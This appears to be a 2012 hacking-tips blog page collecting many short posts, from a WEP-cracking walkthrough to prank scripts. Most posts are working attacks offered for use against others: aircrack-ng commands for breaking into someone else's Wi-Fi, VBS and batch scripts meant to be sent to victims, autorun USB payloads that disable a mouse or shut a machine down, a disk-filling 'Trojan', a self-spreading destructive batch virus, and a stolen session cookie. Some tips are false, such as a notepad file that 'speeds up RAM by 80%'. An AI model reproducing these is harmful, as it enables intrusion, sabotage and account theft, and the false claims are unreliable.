Monday, July 16, 2012

How to hack a wi-fi network

Doesn’t it suck when you see your laptop’s catching so many wi-fi signals but none of them is accessible.. don’t you feel like “I wish I could some how break the password and dive into the deep oceans of the information” I beleive everyone should be able to have free internet. If someday I make it big enough and I’ll be having ample money.. I promise I’ll provide free wifi hotspots all over the places.. “Let there be INTERNET”.. even If I don’t get rich.. I’ll become a politician and would make Internet a Fundemental right to every citizen.. Now that would be something..
That’s enough with the Castles in the air.. now lets get back to reality..
What I can do for you right now is that I can tell you how to hack a wifi network to access Internet.. Some would call it stealing.. some like me won’t..
I’ll call it Sharing.. Sharing is what on which the whole Internet is build upon…
So.. Here’s how we do it..
1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. calledNetStumbleror Kismet for Windows and Linux and KisMac for Mac
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.
It’ll also show how the Wi-fi network is secured..
The two most common encryption types are:
1) WEP
2) WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas
WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismeta wireless network detector
airodumpcaptures packets from a wireless router
aireplay forges ARP requests
aircrackdecrypts the WEP keys
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.
How to Hack a Wifi network | WEP Hacking | Wifi Hacking

2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.
3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).
4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.
How to Hack a Wifi network | WEP Hacking | Wifi Hacking
5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.
6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
8) Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.
How to Hack a Wifi network | WEP Hacking | Wifi Hacking
I am sure it might have helped.:)


Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

How to compress 1 Gb data to 10 mb


Hey guyz this time Learn Hacking has brought something very interesting for you guyz. Many times our hard disk runs out of space and we have to delete some data or the other for no reason. Even I used to face the problem sometime back in history and by doing some research on the topic, I actually found a working and an awesome way to save my hard disk space.

How effective is it?
Well by this method I converted NFS UNDERGROUND 2 which is somewhat around 2 Gb tb 21 Mb. And same is the case with everything important I wanted to save.

How did I do it?
You are just about to know… Read on.

I used a software named KGB Archiver.
 
About KGB archiver: KGB Archiver , an open source compression tool like 7zip and UHARC with an unbelievably high compression rate .It uses AES-256 encryption (one of the strongest encryption known for man) to encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.
Its strength: Very high compression power with very accurate results and no loss of data.
Its weeknss: Due to high compression , the time required to compress and decompress the file is high. High system requirement

From where can you download this software.?
Learn Hacking has already done that for you. Just click on the link given to Download KGB archiver for free.


I am sure you loved this post


Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Bug In Windows Calculator


Hey Readers! this time TechSpot has brought a cool windows bug for you guys.
Its something everyone should know.

This is a Bug in Windows Calculator.

Note:- It works with all versions of Windows.

So without much discussion, let me proceed to the bug.
Have you ever used square root button in windows?
If yes, it is a possibility that you might have come across this bug…. If not, you are just about to know it..

Just follow the steps:-
1) Open calculator ie..  
   Goto run and type – calc 
2) Now type the following
   2.1) Type 4
   2.2) Take its square root  by using the square root button,
   2.3) Now you will get 2. Subtract 2 from it.
   2.4) The answer should have been 0 but its not. You would have got a long number as your answer.

See.. it was as simple.
Here is the general syntax to this bug.
1) Take Any number 
2) Take its square root
3) Subtract its square root from it
4) Your answer is not 0.. That’s the bug.

I am sure this was something new for most of you out here..;-)




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Continuously pop out your friend’s CD or DVD Drive.

Type in Note Pad
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



Save it as pc.vbs and send it to your friends.


Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Hack your friend’s keyboard and make him type “You are a fool” simultaneously


Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as pc.vbs and send it to your friends.

Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Make Keyboard Keys Type Continuously


Make Keyboard Keys Type Continuously

Type in Note Pad
MsgBox “stop me..! if you can”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as pc.vbs and send it to your friends.
 
Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

NotePad Trick to Scare your Friends



notepad tricks

Cycle a message in your friend’s computer.
            Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as pc.bat and send it to your friends.

Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Make Folders with Invisible Names



You may have given or find varieties of folder name in your or in your friend’s computer. But have you ever tried to give your folder a blank name or in other words an invisible name? Computer by default do allow you to take space as your folder name. Here are the few steps which will help you to create your without name folder.

Step1: Click the right button of your mouse on the folder whose name you wish to keep invisible.
Step2: Now click on Rename.

 Step3: Now pressing the “alt” key, type “0160”.
However, type this number only with the help of keypad which is on the right hand side of your keyboard.
Step 4: Now simply click anywhere outside folder.


Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Find Out Who Unfriended You on Facebook



You log on Facebook in the evening and you have 252 friends. However, the next morning you wake up and your friend count has dropped to 249. Who are these three mysterious friends that disappeared?

Unfortunately, Facebook does not send a notification when someone unfriends you on the social network site. However, you don’t have to scroll through each friend and try to figure out who’s missing either. Within a few short minutes, you can find out exactly who has deleted you as their friend. The new Timeline design on Facebook has made it much easier to find out who has unfriended you.
  1. To begin, log onto Facebook and head on over to your profile page. To the right of the page, you’ll see a list of the years you’ve been on the social network.
  1. Click on any previous year listed. A “Friends” menu will pop up on your profile. This will tell you which friends you added during this particular time period.
  1. Scroll over the friends and it will tell you whether or not you’re still friends with the person.
  1. Install a plugin to identify who has unfriended you. Another option is to use a reliable plug-in to find out who unfriends you. For instance, the Unfriend Finder works on Internet Explorer, Safari, Firefox, Opera and Chrome browsers. Once installed, you’ll receive notifications when someone unfriends you or deletes his or her account.
Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Speed up your Computer by 80% with Notepad




Notepad can be used to speed up your computer by clearing the RAM.  Without a doubt, RAM is one of the most important resources in your computer. It’s comparable to gas in a car. The more free RAM you have, the faster your computer will perform. Clearing the RAM cache is a efficient way to improve your performance.
Before tweaking notepad to speed up your PC, follow these steps:
1). Go to “MyComputer” and click on tools (in case you have xp) or organize (in case you have windows 7).
2).Go to “folder and search” option and hit your mouse left key.
3). Select view and uncheck “Hide extension for known file type”
4). Click OK.
Now the initial setting are done and notepad work comes:
1). Open notepad.
2). Type: “mystring=(80000000)” (without quotes).
3). Save the notepad file with the name RAM. Vbe and Close it.
4). Now every time you click on this file, it will clear your computer’s RAM and makes it almost 80% faster.


Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Make Your Computer Speak When you Log On


It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
 
 
 
Open Notepad
Paste the bellow code in Np
 


Dim speaks, speech
speaks="Welcome Back, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks












Replace Username with your Name
Click Save As and save as type Welcome.vbs
Copy File Welcome.vbs and paste it in bellow address

                                                             Windows-7

C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


*Replace Username with your username and C:\ with your Root Drive
                                                             Windows-Xp

C:\Documents and Settings\All Users\Start Menu\Programs\Startup





Done Log Off and Log In Amazed? .Now Your computer welcomes you




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

How to track IP address of anyone using email ?



How to track IP address of anyone using email ?

step 1:
know what is your victim email id.
For eg:
victimid[@]gmail.com
step 2:
Register an account here: http://www.readnotify.com

step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com

step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Increase the Download speed of Hotfile like premium account-cookies hack


Hi Friends,  i think this is my first about hotfile.   Hotfile is file sharing website.  In hotfile , downloading speed for normal user is very slow.  But for premium account it will be faster.  In this post, i am going to explain how to downlod files from hotfile like premium account. 

Here is video Version of this tutorial:
How to use Premium cookies? Video Tutorial

In this method, we are going to use the premium cookies(cookie got from cookie stealing method).  Website detects the user based on the cookies.  cookies is only factor that detects whether you are normal user or premium user.  More details about session and cookies. So Using the Premium cookies , you can make the website to believe that you are the premium user.  Sounds good..!! but how to do? This can achieved by Cookies Editing.

Method 1:
Requirements:

  • normal Free account in Hotfile
  • Premium cookies
  • Install Web Developer Add on

Step 1: Install Web Developer Add on
Install the Web developer add on.  Using this add on we are going to edit the cookies

https://addons.mozilla.org/en-US/firefox/addon/web-developer/
 
Restart the browser. now you can see the web developer toolbar. It consist of Disbale, cookies,css,forms....etc. We are going to use cookies option alone for this hack.

Step 2: Login with Free account
Login to your Free account in Hotfile.com

Step 3:
I hope you are in hotfile.com.  Now click the Cookies option in the Web developer tool bar. and select View Cookies information.  It will list of cookies. 

Step 4: Find auth cookie
Find the cookie that named as "auth".  (you can see this if you are login ).


Step 5: Edit cookie
Click the Edit cookie link.  It will open the new pop up window.


Step 6:Change the Value
Now Delete the contents of Value Label.  Paste the premium cookie that you have inside the value text field. and Click ok ( Premium Cookie given below ).

Step 7: What is the next step?
You are now premium member.!!! Start to download hot file like a premium member.  Enjoy..!!!

Method 2:
Method 2 is same as method 1.  Instead of editing cookie , we just add new cookie.  So for this method, no need of free account also.

  1. Visit hotfile.com
  2. Click the cookie option as said in the above method.
  3.  Select Add cookie 
  4. It will open the small pop up window.
  5. enter "auth" in the name field
  6. Paste the premium cookies in the "Value" field.
  7. Reload the page
  8. That's all you finished.


Both methods works perfectly.
Having doubts ..??!! Post comments here.


Here is the one premium cookie for you:(copy it to your desktop, i will delete as soon as possible)
4afa81803373a6e2c29fcc1f782f8161d327c529eaa4e124e6eff19a822bfe9b




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Can't Delete an Adminstrator Account ?


Right click my computer.

Go to manage.

Go to Local Users and Groups, and then Users.

Now you should be able to delete the user.




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Create a virus program to disable the USB ports in C program




All budding hackers eager to learn how to create a virus .  Here is simple tutorial which will make a virus in c program(no need to worry  ,if you don't know about c program because coding is here for you).




Steps to follow:

1. Download the source files from here:

2. Extract the zip file
 It contains the following 2 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3.Copy the file to folder "c:\tc\bin" (if you don't have folder, means you didn't install c compiler.  so  read this tutorial to install and compile

4.  Open the Turbo c compiler
5.  Open the Two files in turbo c compiler
6.  compile it(alt+f9)
7. press f9 for creating exe file(don't press ctrl+f9 ,it will run the program)
8.  Now go to folder C:\Tc\bin
9.  There you can find  two exe files  namely block_usb.exe ,unblock_usb.exe
10.  Now run the block_usb.exe file(just double click the exe file) .  insert your pen drive , it is undetectable.
11.  Now run the unblock_usb.exe file(just double click the exe file) .  Now your pen drive will be detected.


The first blcok_usb program will disable the the USB port.
The unblock_usb program will make it enable


You can send this file to your friend also.  Icon of exe file is look like cmd icon.  So need to change it.
so Read How to change the icon of exe file.





Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

Create a Memory Space Eater Trojan Horse with simple c program




Most of us (as a hacker) like to create a Trojan Horse .  Today in this post i am going to explain you how to create a virus which eats the Memory space in your victim Hard Disk Drive.



Characteristics of this Trojan:

This trojan eats 1GB of memory for every 1 minutes.

As a result the the disk gets filled up to 100% with in minutes of running this Trojan.
Once the disk space is full, the Trojan reports that the scan is complete.
The victim will not be able to clean up the hard disk space using any cleanup program.
This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the.dll extension.
Since the junk file has the .dll extention it is often ignored by disk cleanup softwares.
So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

Download the Source code From here
            http://www.ziddu.com/download/12709576/Space_Eater.zip.html


The algorithm of the Trojan is as follows:

1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.


How to compile, test and remove the damage?

To know how to compile read c-program-and-how-to-compile-it.
For more details read this also create-virus-program-to-disable-usb

Testing:

To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
   NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
        %systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
      NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?




Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

How to disable your victim's Mouse whenever he insert's pen drive





Hi friends ,  Hacking is one of the fun .  You can attract your friends by simply doing some hacks before them.  You can also make your victims or enemies in confusion.  This article will help you to make the small fun with hack. 

Let's come to the point.  Today i am going to guide you how to disable your victim's or friend's (whoever) mouse,whenever he inserts  pen drive.  You can call it as virus which will disable the mouse.



How we are going to do?
    We are going to create this virus using our usual Batch programming.  In this post i am not only giving you simply the code but also explanation for the Batch program.   So I hope that this post will make you happy.

Batch Programming Code:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Explanation about this code
   "@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself. (don't confuse now,batch programming intro will make you clear).

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in  this location"HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

  you can manually go to this path: start->run and type as "regedit" now window will open . you can find folder named as "HKEY_LOCAL_MACHINE ,click the folder you can find list of folder also includes system folder.  likewise you can move to mouse class
Mouse Class Registry

The third line of our code is "reg delete %key%" . This will delete the key in the MouseClass from registry.

"reg add %key% /v Start /t REG_DWORD /d 4" creates a new key with
 Binary value name as "start" ,
type is "REG_DWORD"
and data as "4"   (actually the fore will be stored in hexadecimal format, 0×00000004).

The  Procedure to create this virus:
    Okay now we will see the what are the procedure to follow in order to make this virus perfectly work in victim pc. 

Step 1:
  1.    Copy the Batch code into notepad. 
  2.    Save it as .bat extension (for eg: clickme.bat)
Step 2:  
      Now open the notepad and copy this code:
[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.
Step 3: 
         Then copy the two files in your pen drive or victim's pen drive.


That's all we have finished.  Now bring your pen drive to your friend or victim home.  Now whenever the mouse is inserted ,the mouse will be disabled.


How to recover from this attack?
        Sorry for mentioning this fun as attack.  To recover from this attack ,you can follow these steps:
Copy this code into the notepad:
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1


and save it with .bat extension(for eg: release.bat).
now open this batch will re-enable the mouse actions.



Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

How to shutdown your victim's system using pen drive


In my last post i explained you about how to create a virus which will disable the mouse whenever pen drive inserted.  In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted.
Step 1:
copy this code into notepad:

@echo off
shutdown -s -t 00

Save it with .bat extension (for eg: clickme.bat).

Step 2:  
      Now open the notepad and copy this code:

[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.
Step 3: 
         Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.






Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

A Dangerous Virus


In this post i am going to give you dangerous virus code which is written in Batch Programming language.

Virus can do:

  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

  Be careful..!! if you double click the batch file,then you are the victim of this virus

Try this in your school or college or in your friend computer.



Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .